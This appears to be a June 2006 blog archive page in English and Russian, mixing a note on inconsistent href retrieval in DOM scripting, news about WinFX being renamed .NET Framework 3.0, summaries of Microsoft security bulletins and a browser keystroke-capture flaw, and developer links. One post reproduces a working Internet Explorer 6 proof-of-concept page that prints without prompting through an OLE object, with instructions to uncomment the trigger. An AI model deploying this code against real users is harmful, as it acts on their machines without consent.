Archive for Июнь, 2006
Whilst working on the Ajax Link Tracker and MapSurface I have come across an inconsistency in how the href attribute is retrieved using DOM Scripting.
The href attribute is different to other element attributes in that the value set can be relative to the context of the page URL. If you set a link with a relative href attribute
<a href=”../development/test1.html”>test page</a>
The browser will look at the pages current URL and derive an absolute URL for the link.
http://www.glenn.jones.net/development/test1.html
This is the root of the problem, some browsers return the text of the attribute and others return the derived absolute URL. The results also differ by the method you use to retrieve the href attribute. There are three common ways to access an attribute:
linkobj.href;
linkobj[‘href’];
linkobj.getAttribute(‘href’);
The linkobj.href and linkobj[‘href’]; methods of accessing the attribute consistently return the derived absolute URL.
Microsoft has tried to address this by problem adding a second parameter to the getAttribute method. The second parameter can be set to 0,1 or 2. If the parameter is set to 2 the method returns the attribute text. Any other setting will return the derived absolute URL.
linkobj.getAttribute(‘href’);
linkobj.getAttribute(‘href’,2);
Get attribute test page Test on IE6, Firefox 1.5 and Opera 8.51.
Июнь 16th, 2006
Microsoft официально заявила о переименовании своего API WinFX в более
привычный для слуха .NET Framework 3. Это, вероятно, последнее
переименование. Нет уже Longhorn (Vista), канули в прошлое Avalon (WPF),
Indigo (WCF). Время пришло переименовать WinFX…
Следующие можно прочесть на MSDN блоге Сомасежара, работника Microsoft:
Цитата:
*Когда ты говоришь разработчикам о WinFX единственный возникающий вопрос это
– «WinFX звучит великолепно, но куда подевался .NET?». .NET Framework
становится самой успешной платформой в мире. Разработчики знают и любят
.NET.
.NET Framework всегда был в ядре WinFX, но название WinFX не говорило об
этом. Термин WinFX помог нам ввести такие инновационные бренды, как Windows
Presentation Foundation (WPF), Windows Communication Foundation (WCF),
Windows Workflow Foundation (WWF) и недавно переименованный Windows
CardSpace (WCS), ранее известный под кодовым именем InfoCard. Но этот бренд
также создал неестественную неоднородность между предыдущими версиями наших
платформ и новыми.
Именно поэтому было принято решение о переименовании WinFX в .NET Framework
3.0. .NET Framework 3.0 точно описывает нашу платформу – следующую версию
нашей платформы для разработчиков.
Изменение произошло только в имени и никак не отразится на технологии. .NET
Framework 3.0 продолжает состоять из таких компонентов как .NET Framework
2.0, ASP.NET, WinForms, ADO.NET, дополнительных библиотек и CLR, также как и
абсолютно инновационных технологий WPF, WCF, WWF и WCS.
.NET Framework 3.0 также будет поставляться вместе с Windows Vista и будет
доступен для Windows XP и Windows Server 2003. Это изменение никак не
отразится на планах относительно Windows Vista или самого .NET Framework 3.0
.
Мы уверены, что это изменение откроет глаза многих людям, заблуждающимся и
непонимающим значения наших платформ.*
Как видно из этого текста, не только с WinFX прощаемся мы, но и с InfoCard.
Нечто подобное мы можем прочесть и на блоге Дэга Махуга:
Цитата:
*
WinFX становится .NET 3.0
Для упрощения стратегии инструментов разработки Microsoft и чтобы сделать
разработчикам более ясным этот сегмент, сегодня днем произошло новое
изменение: WinFX теперь известен под именем третьей 3.0 версии .NET
Framework. Это не отразится на самой технологии: все относящееся к WinFX
осталось по-прежнему, включая технологии WPF, WCF, Workflow и новые API,
которые будут частью .NET 3.0.*
Источник: http://blogs.msdn.com/dmahugh/ http://blogs.msdn.com/somasegar/
*Перевод: Райкер*
Июнь 16th, 2006
Корпорация Microsoft в рамках ежемесячного обновления своих программных
продуктов выпустила очередную порцию заплаток для операционных систем
Windows.
Одна из критически опасных уязвимостей
найдена http://www.microsoft.com/technet/security/Bulletin/MS06-026.mspx в
механизме обработки изображений Graphics Rendering Engine. Для
реализации
атаки злоумышленнику необходимо вынудить жертву открыть специальный
графический файл в формате WMF. Эксплуатируя дыру, нападающий может
выполнить на ПК произвольный код. Брешь присутствует только в Windows 98/98
SE/ME.
Особенности обработки изображений в формате ART позволяют получить
несанкционированный доступ к компьютерам под управлением Windows ХР/Server
2003. Для этого также необходимо вынудить жертву особый графический файл.
Брешь, подробнее о которой можно узнать
здесь http://www.microsoft.com/technet/security/Bulletin/MS06-022.mspx,
названа критически опасной.
Для пользователей приложения Windows Media Player версий 9 и 10 опасность
могут представлять графические изображения в формате PNG. Реализовать атаку
можно через веб-сайт или WMZ-файл, при открытии которого происходит
переполнение буфера. Дыре
присвоен http://www.microsoft.com/technet/security/Bulletin/MS06-024.mspx рейтинг
максимальной опасности.
Еще две критически опасные уязвимости выявлены в компонентах RRAS (Routing
and Remote Access Service) и JScript. В первом случае атакующий может
спровоцировать http://www.microsoft.com/technet/security/Bulletin/MS06-025.mspx ошибку
переполнения буфера на компьютере-жертве и выполнить произвольный
код. Дыра в модуле JScript
позволяет http://www.microsoft.com/technet/security/Bulletin/MS06-023.mspx повредить
данные в памяти и перехватить контроль над машиной.
Две уязвимости в Windows охарактеризованы корпорацией Microsoft как важные.
Одна из них связана http://www.microsoft.com/technet/security/Bulletin/MS06-032.mspx с
реализацией протокола TCP/IP в ОС Windows 2000/ХР/Server 2003 и
позволяет
злоумышленнику получить доступ к данным. Организовать атаку можно только в
том случае, если на удалённой машине активирована служба IP Source Routing
или RRAS. Вторая дыра обеспечивает возможность повышения привилегий
пользователя. Уязвимость http://www.microsoft.com/technet/security/Bulletin/MS06-030.mspx может
быть задействована через специальный SMB-запрос (Server Message
Block).
Наконец, ещё одна дыра связана с особенностями реализации функции взаимной
аутентификации в службе удаленного вызова процедур (RPC). Уязвимость не
представляет особой опасности и присутствует только в операционной системе
Windows 2000. Подробнее о проблеме можно узнать
здесь http://www.microsoft.com/technet/security/Bulletin/MS06-031.mspx.
http://security.compulenta.ru/273163/
Июнь 16th, 2006
Сразу несколько компаний, специализирующихся на вопросах компьютерной
безопасности, сообщили об обнаружении уязвимости во всех распространенных
браузерах.
Дыра, о которой идет речь, как
отмечает http://www.techweb.com/showArticle.jhtml?articleID=188702202 Techweb,
теоретически позволяет злоумышленникам получить несанкционированный
доступ к конфиденциальным пользовательским данным, например, информации о
банковских аккаунтах или паролям. Проблема связана с функцией JavaScript
“OnKeyDown” и обеспечивает возможность перехвата строк, введённых
пользователем с клавиатуры в форму на веб-странице.
По информации датской компании Secunia, брешь присутствует в браузерах
Internet Explorer версии 6.х и более ранних модификациях, Firefox версий 1.х,
Netscape 8.х и более ранних модификациях, Mozilla версий до 1.7.х и пакете
SeaMonkey 1.х и ниже. Ситуация ухудшается ещё и тем, что проблема не зависит
от используемой на компьютере операционной системы - нападение может быть
осуществлено на машины, работающие под управлением Windows, Linux и Mac OS
X.
Патча для дыры в настоящее время не существует. Впрочем, нужно отметить, что
организовать атаку на компьютер через данную брешь можно только при условии
выполнения определённых действий потенциальной жертвой. Поэтому компания
Secunia охарактеризовала брешь малоопасной. С примером программного кода,
позволяющего задействовать уязвимость, можно ознакомиться
здесь http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html
Июнь 13th, 2006
http://www.i-see.net/bindows/bindows/samples/applauncher/
Июнь 13th, 2006
Vulnerable Systems:
* Internet Explorer version 6
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. An example page that exploits the vulnerability is given below. The offending line must be commented out in order for the page to work, so are any linebreaks that break the JavaScript code.
<html>
<head>
<script language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{
// Create OLE Object
var WebBrowser = '<object ID="WebBrowser1" WIDTH=0 HEIGHT=0
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></object>';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
}
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
}
</script>
</head>
<body onload="printAll()">
<h4>I like your PRINTER</h3>
</body>
</html>
Июнь 13th, 2006
http://www.telerik.com/r.a.d.controls/Editor/Examples/WhatsNew/DefaultVB.aspx
Июнь 13th, 2006
http://developer.yahoo.com/yui/
Yahoo! User Interface Library
The Yahoo! User Interface (YUI) Library is a set of utilities and controls, written in JavaScript, for building richly interactive web applications using techniques such as DOM scripting, DHTML and AJAX. The YUI Library also includes several core CSS resources.
Июнь 13th, 2006
Previous Posts
Home
Login